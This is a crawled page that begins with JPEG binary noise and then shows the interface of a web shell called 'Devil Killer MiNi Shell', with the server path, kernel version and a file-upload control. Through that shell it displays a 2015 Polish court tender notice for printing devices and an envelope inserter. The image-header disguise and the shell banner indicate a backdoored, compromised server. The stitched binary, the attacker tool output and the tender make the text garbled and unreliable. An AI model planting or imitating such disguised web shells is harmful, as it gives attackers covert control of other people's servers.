JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150731/114995-N-2015.html

<p class="kh_header"><b>Szczecin: Dostawa kopertownicy i urządzeń druku masowego  
na potrzeby Sądu Apelacyjnego w Szczecinie</b><br>
<b>Numer ogłoszenia: 114995 - 2015; data zamieszczenia: 31.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Apelacyjny w Szczecinie , ul. Mickiewicza 163, 71-165 Szczecin, woj. zachodniopomorskie, tel. 091 4849409, faks 091 4849408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.sa.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kopertownicy i urządzeń druku masowego  
na potrzeby Sądu Apelacyjnego w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa, instalacja, uruchomienie fabrycznie nowych i nie używanych 2 sztuk urządzeń druku masowego oraz 1 sztuki kopertownicy, które muszą spełniać wymagania określone poniżej(w tym posiadać poniższe minimalne parametry techniczne i funkcjonalne). 
2.	Zamawiający dopuszcza składanie ofert częściowych.
3.	Przedmiot zamówienia został podzielony na dwie części:
1)	Część I - Dostawa urządzeń druku masowego:
Minimalne parametry techniczne i funkcjonalne urządzenia druku masowego:
Parametr lub warunek	Minimalne wymagania
Ogólne	Monochromatyczny produkcyjny system wielofunkcyjny (dostępne opcje drukowania, kopiowania i skanowania do pliku)
Wydajność	Minimum 110 stron A4 1+0 na minutę
Obciążalność	Do 2 000 000 wydruków A4 miesięcznie
Interfejs użytkownika	Kolorowy ekran dotykowy
Rozdzielczość druku	Minimum 1200 x 1200 dpi
Eksploatacja	- Możliwość wymiany tonera podczas pracy urządzenia (druku/kopiowania)
- Możliwość samodzielnej i łatwej wymiany przez operatora materiałów eksploatacyjnych zużywających się podczas użytkowania urządzenia tj. toner, element światłoczuły lub odpowiednik, ewentualny zbiornik na zużyty toner lub odpowiednik itp.
Obsługiwane formaty	- Minimalny obsługiwany format papieru nie większy niż A6 tj. 105 x 148 mm
- Maksymalny obsługiwany format papieru nie mniejszy niż 324 x 483 mm
- Obsługiwana gramatura papieru z zakresu co najmniej 60-250 g/m2
Podajniki	- Minimum 6 tac podających papier do zadruku
- Minimum 6 000 arkuszy papieru o gramaturze 80 g/m2 pojemności całkowitej tac podających papier do zadruku
- Możliwość uzupełniania papieru w podajnikach podczas pracy urządzenia (druku/kopiowania)
- Możliwość logicznego łączenia podajników w jeden z tym samym papierem
- Minimum 1 taca insertera (podajnika na wcześniej zadrukowane arkusze) o pojemności min. 200 arkuszy
Moduł odbierający wydruki	- Moduł odbierający wydruki o pojemności minimum 3 500 arkuszy papieru o gramaturze 80 g/m2
- Odbiór wydruków z przesunięciem umożliwiającym odróżnianie kolejnych egzemplarzy
- Zszywanie 1 lub 2 zszywkami do min. 100 arkuszy na dowolnej krawędzi
- Zszywanie formatów A4 i A3
- Dziurkowanie 2 lub 4 otwory
- Prostowanie arkuszy po wydruku (możliwość zmiany kierunku odkształcania)
Skanowanie	- Automatyczny podajnik oryginałów o pojemności minimum 100 arkuszy
- Prędkość skanowania minimum 100 obrazów A4 1+1 na minutę w rozdzielczości 600x600 dpi
- Możliwość skanowania do pliku w formacie PDF, PDF/A, TIFF, XPS
- Skanowanie z rozdzielczością minimum 600 x 600 dpi
Zewnętrzny kontroler wydruku - parametry techniczne	Zewnętrzny kontroler wydruku powinien posiadać następujące parametry techniczne:
- Co najmniej procesor dwurdzeniowy powyżej 2 Ghz
- Pamięć RAM co najmniej 4GB
- Dysk twardy o pojemności co najmniej 500 GB
- Interfejs sieciowy Ethernet 10/100Base-T, 1Gigabit
- Powinien obsługiwać bezpośrednio strumienie danych Adobe PostScript 1/2/3, PDF 1.8, PDF/X, PCL5c/5e/6XL, TIFF v6.0, ASCII, PPML
Zewnętrzny kontroler wydruku - funkcjonalności	Zewnętrzny kontroler wydruku powinien pozwalać na poniższe funkcjonalności: 
- automatyzacja (ustawienie różnych parametrów druku) procesu druku za pomocą min. 50 kolejek druku, które można również ustawić jako udostępnione katalogi w sieci
- szablony impozycyjne tj. 2-up, 4-up, do oprawy zeszytowej, do oprawy szytej klejonej oraz dodawanie znaczników cięcia, marginesów zewnętrznych i wewnętrznych
- tworzenie listy mediów z których najczęściej korzystamy
- Preflight (sprawdzanie drukowanego pliku pod kontem użytych czcionek i ich załączenia do dokumentu) oraz możliwość instalowania nowych czcionek w tym kodów kreskowych jedno i dwuwymiarowych
- Soft-proof (możliwość podglądu zrastrowanej pracy przed jej wydrukowaniem zawierający efekt wprowadzonych ustawień tj. format papieru, impozycja, znaczniki cięcia itd.
- dynamiczne sterowanie funkcjami odbiornika wydruków tj. sortowanie lub zszywanie na poziomie podzestawów zawierających różną ilość zadrukowanych arkuszy
Bezpieczeństwo	Urządzenie powinno umożliwiać: filtrowanie adresów IP, blokowanie portów i protokołów, nadpisywanie danych, ograniczenie dostępu do kontrolera druku na podstawie kont użytkowników z bezpiecznym hasłem
Certyfikaty	Urządzenie powinno spełniać minimum certyfikat CE
Dodatkowe	- Możliwość tworzenia własnych narzędzi oraz instalowania ich na urządzeniu w celu modyfikacji panelu urządzenia oraz zwiększania jego funkcjonalności w celu dopasowania się do procesów związanych z drukiem i skanowaniem
- Firma serwisująca musi posiadać certyfikat ISO 9001 na świadczenie usług serwisowych
- Wykonawca w momencie dostawy urządzenia będzie musiał doręczyć oświadczenie producenta, iż oferowany egzemplarz jest fabrycznie nowy - wyprodukowany nie wcześniej niż w roku 2015.
- W zestawie wszystkie niezbędne kable do uruchomienia urządzenia
Obsługa serwisowa i gwarancja	Wraz z dostawą urządzeń Zamawiający wymaga obsługi serwisowo materiałowej w okresie 24 miesięcy.
Uruchomienie i montaż urządzeń drukujących we wskazanym przez Zamawiającego pomieszczeniu
Warunki świadczenia obsługi serwisowo - materiałowej:
- Świadczenie obsługi od dnia dostawy przez okres 24 miesięcy.
- W okresie 24 miesięcy Zamawiający będzie miał możliwość wydrukowania do 2.500.000 obrazów A4 bez ograniczania rozdziału prac na urządzenia.
- Obsługa serwisowo - materiałowa musi być wykonywana przez osoby przeszkolone i uprawnione, Wykonawca musi posiadać certyfikat ISO na świadczenie usług serwisowych.
W ramach obsługi serwisowo - materiałowej liczonej od daty uruchomienia urządzeń drukujących Wykonawca zobowiązany jest do:
- zapewnienia stałej sprawności operacyjnej zaoferowanych urządzeń,
- okresowych przeglądów zaoferowanych urządzeń,
- usuwania niesprawności wynikających ze zużywania się części zamiennych oraz materiałów eksploatacyjnych, usuwania awarii sprzętu i oprogramowania,
- pełnej dostawy i wymiany części zamiennych oraz materiałów eksploatacyjnych,
- świadczenia usług serwisowych w dni robocze Zamawiającego, tj. od poniedziałku do piątku w godzinach od 7:30 do 15:30,
- zapewnienia czasu reakcji serwisowej w następnym dniu roboczym po zgłoszeniu telefonicznym, potwierdzonym niezwłocznie faxem lub e-mailem,
- zapewnienie czasu naprawy lub wymiany zużytych materiałów eksploatacyjnych i części zamiennych do 48 (czterdziestu ośmiu) godzin od momentu zgłoszenia, z zastrzeżeniem, że w uzasadnionych przypadkach, np. udokumentowana potrzeba sprowadzenia części z zagranicy  Zamawiający może wyrazić zgodę na wydłużenie czasu naprawy lub wymiany do 72 (siedemdziesięciu dwóch) godzin liczonych od momentu zgłoszenia,
- usługi serwisowe świadczone będą w siedzibie wskazanej przez Zamawiającego w Szczecinie.

4.	Część II - Dostawa kopertownicy
Minimalne parametry techniczne i funkcjonalne kopertownicy:
Parametr lub warunek	Minimalne wymagania
Wydajność	Minimum. 5 400 cykli na godz. (pod pojęciem cykl należy rozumieć złożenie na pół jednej kartki formatu A4 i zapakowanie jej do koperty formatu C5).
Obciążenie miesięczne	Minimum 200 000 cykli.
Ilość i rodzaj podajników dokumentów	Minimum 4 gniazda podajników. Możliwość wymiennego instalowania podajników arkuszy i szablonów w ramach wolnych gniazd w module głównym. (np. jednorazowo cztery podajniki arkuszy). W zestawie wymagane min. 2 podajniki arkuszy oraz min. 2 podajniki szablonów.
Budowa podajników dokumentu głównego	Wyposażone w detekcję podwójnego pobrania, konstrukcja podajnika umożliwiająca dokładanie arkuszy papieru bez konieczności zatrzymywania kopertownicy.
Odbiornik	Kosz odbiorczy o pojemności min. 200 kopert.
Odbiornik Taśmowy	Możliwość zainstalowania wzdłużnie lub poprzecznie odbiornika taśmowego długości min. 1200 mm. Odbiornik taśmowy musi byś dostarczony jako wyposażenie do urządzenia.
Podstawa	Dedykowany stół do kopertownicy z elektrycznie regulowaną wysokością.
Metody sterowania pracą kopertownicy	Możliwość zaprogramowania min. 24 programów, z późniejszą możliwością edycji.

Sterowanie kompletowaniem przesyłek	Minimum moduł optyczny rozpoznający znaczniki OMR/BCR 
Panel sterowania	- Panel sterowania informujący o wszystkich czynnościach kopertownicy, o ewentualnych błędach jak również o możliwych sposobach ich usuwania.
- Panel powinien być wyposażony w kolorowy ekran LCD i klawiaturę z przyciskami funkcyjnymi. Informacje na panelu powinny być przedstawiane w trybie graficznym i tekstowym.
- Panel powinien zapewniać pełny podgląd zaprogramowanych prac oraz diagnostykę urządzenia.
- Polski opis klawiatury oraz wszystkie komunikaty wyświetlane na ekranie musza być w języku polskim.
Obsługiwana gramatura papieru	- Podajnik arkuszy min. od 60 g/m2 do 120 g/m2
- Podajnik szablonów min. od 60 g/m2 do 180 g/m2
- Podajnik kopert min. od 70 g/m2 do 100 g/m2
Obsługiwane wymiary papieru	- Arkusze szerokość - min. od 125 mm do 250 mm
- Arkusze długość - min. 135 mm do 356 mm
- Szablony szerokość - min. 127 mm do 250 mm
- Szablony długość - min. 72 mm do 153 mm
- Minimalna grubość szablonu min. 2,54 mm
Obsługiwane wymiary kopert	C6/5 (114 mm x 229 mm), C5 (162mm x 229 mm), C4 (229mm x 324 mm)
Podajnik kopert	Wysokowydajny podajnik kopert o pojemności min. 500 kopert
Ilość rodzajów złożeń	Minimum 5 V, Z, C, Podwójne, Bez Składania
Ilość arkuszy składanych jednorazowo	Złożenie C lub Z - min. 8
Złożenie V - min. 10
Ilość kartek do zapakowania	- Koperta C6/5 - min. 8 
- Koperta C5 - min. 10
- Koperta C4 - min. 25
Kopertowanie arkuszy zszytych zszywaczem	Kopertowanie zszytych arkuszy w ilości min. 8 
Certyfikaty i normy	Urządzenie powinno posiadać minimum certyfikat CE.
Dodatkowe wymagania	- Wykonawca w momencie dostawy urządzenia będzie musiał doręczyć oświadczenie producenta, iż oferowany egzemplarz jest fabrycznie nowy - wyprodukowany nie wcześniej niż w roku 2015.
- Firma serwisująca musi posiadać certyfikat ISO 9001 na świadczenie usług serwisowych oraz autoryzację na serwis producenta oferowanego urządzenia
- W zestawie wszystkie niezbędne kable do uruchomienia urządzenia
Dalsze możliwości rozbudowy	Możliwość dalszej rozbudowy maszyny o kolejne podajniki dokumentu (dwa lub cztery podajniki każdy po min.1000 arkuszy papieru), podajnik wysokonakładowy na min. 4500 arkuszy, możliwość nauczenia maszyny czytania dowolnych kodów OMR.
Obsługa serwisowa i gwarancja	Wraz z dostawą urządzenia Zamawiający wymaga obsługi serwisowo materiałowej w okresie 24 miesięcy.

Warunki świadczenia obsługi serwisowo - materiałowej:
- montaż i uruchomienie kopertownicy we wskazanym przez Zamawiającego pomieszczeniu 
- Świadczenie obsługi od dnia podpisania protokołu odbioru przez okres 24 miesięcy.
- W okresie 24 miesięcy Zamawiający będzie miał możliwość wykonania do 1.000.000 zakopertowań.
- Obsługa serwisowo - materiałowa musi być wykonywana przez osoby przeszkolone i uprawnione, Wykonawca musi posiadać certyfikat ISO na świadczenie usług serwisowych.

W ramach obsługi serwisowo - materiałowej liczonej od daty uruchomienia urządzenia kopertującego Wykonawca zobowiązany jest do:
- zapewnienia stałej sprawności operacyjnej zaoferowanego urządzenia,
- okresowych przeglądów zaoferowanego urządzenia,
- usuwania niesprawności wynikających ze zużywania się części zamiennych oraz materiałów eksploatacyjnych, usuwania awarii sprzętu i oprogramowania,
- pełnej dostawy i wymiany części zamiennych oraz materiałów eksploatacyjnych,
- świadczenia usług serwisowych w dni robocze Zamawiającego, tj. od poniedziałku do piątku w godzinach od 7:30 do 15:30,
- zapewnienia czasu reakcji serwisowej w następnym dniu roboczym po zgłoszeniu telefonicznym, potwierdzonym niezwłocznie faxem lub e-mailem,
- zapewnienie czasu naprawy lub wymiany zużytych materiałów eksploatacyjnych i części zamiennych do 48 (czterdziestu ośmiu) godzin od momentu zgłoszenia, z zastrzeżeniem, że w uzasadnionych przypadkach, np. udokumentowana potrzeba sprowadzenia części z zagranicy  Zamawiający może wyrazić zgodę na wydłużenie czasu naprawy lub wymiany do 72 (siedemdziesięciu dwóch) godzin liczonych od momentu zgłoszenia,
- usługi serwisowe świadczone będą w siedzibie wskazanej przez Zamawiającego w Szczecinie.

5.	Urządzenia należy dostarczyć do Sądu Rejonowego Szczecin-Prawobrzeże i Zachód w Szczecinie, pl. Żołnierza Polskiego 16, 70-551 Szczecin:
6.	Dokładne pomieszczenia do których należy dostarczyć, zainstalować i uruchomić urządzenia w uzgodnieniu z Zamawiającym na etapie wykonywania dostawy.
7.	Zamawiający nie dopuszcza możliwości złożenia oferty przewidującej odmienny niż określony w niniejszej SIWZ sposób wykonania zamówienia (oferty wariantowej).
8.	Zamawiający nie przewiduje zawarcia umowy ramowej.
9.	Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 pzp.
10.	Zamawiający nie zastrzega w ogłoszeniu o zamówieniu warunku, o którym mowa w art.22 ust. 2 ustawy Prawo zamówień publicznych.
11.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
12.	Płatnikiem będzie: 
Sąd Apelacyjny w Szczecinie, ul. Mickiewicza 163, 71-165 Szczecin, NIP: 852-24-32-814..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.13.12.00-8, 30.23.21.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości:
a)	Dla części I (urządzenia masowe) 3.000 zł (słownie:  trzy tysiące zł ) w terminie do dnia 18.08.2015 r. do godziny 11.00. Decyduje moment wpływu środków do zamawiającego.
b)	Dla części II (kopertownica) 2.500 zł (słownie:  dwa tysiące pięćset zł ) w terminie do dnia 18.08.2015 r. do godziny 11.00. Decyduje moment wpływu środków do zamawiającego.
c)	
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na następujący rachunek bankowy (konto Sądu Apelacyjnego w Szczecinie): numer konta: 03 1130 1017 0021 1002 2890 0004 z zalecanym dopiskiem: wadium dotyczące sprawy ZP/PN/3/2015. Koszt wniesienia wadium ponosi wykonawca.
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w formie oryginału w godzinach od 9.30 do 12.00 i od 12.30 do 14.00 w  kasie zamawiającego - Sąd Apelacyjny ul. Mickiewicza 163 - parter. Prosimy nie załączać oryginału gwarancji/poręczenia do oferty. 
3.	Wadium może być wniesione w jednej lub kilku formach.
4.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt 7 bez potwierdzania tych okoliczności, 
2)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
5.	Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.
6.	Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie 
przez zamawiającego wykluczony a jego oferta odrzucona.
7.	Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacji, gdy:
1)	wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po jego stronie,
2) 	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, z przyczyn leżących po jego stronie nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
8.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 7 ppkt 2).
9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12.	Jeżeli wadium zostanie wniesione w pieniądzu zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
13.	W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium 
lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwie dostawy:
a)	Jeżeli wykonawca składa ofertę tylko na pierwszą część zamówienia (dostawa urządzeń druku masowego) przedstawia wykazie minimum dwie dostawy na kwotę minimum 100.000 zł brutto dla każdej dostawy,
b)	 Jeżeli wykonawca składa ofertę tylko na drugą część zamówienia (dostawa kopertownicy) przedstawia w wykazie minimum dwie dostawy 100.000 zł brutto dla każdej dostawy.
c)	Jeżeli wykonawca składa ofertę na obie części zamówienia (dostawa urządzeń druku masowego i kopertownicy) przedstawia wykazie minimum 4 dostawy a+b.
W przypadku, gdy wartość dotycząca ww. warunku wyrażona będzie w walucie obcej, zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (za datę wszczęcia postępowania zamawiający uznaje datę umieszczenia ogłoszenia o zamówieniu w miejscu publiczne dostępnym w swojej siedzibie oraz na stronie internetowej). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
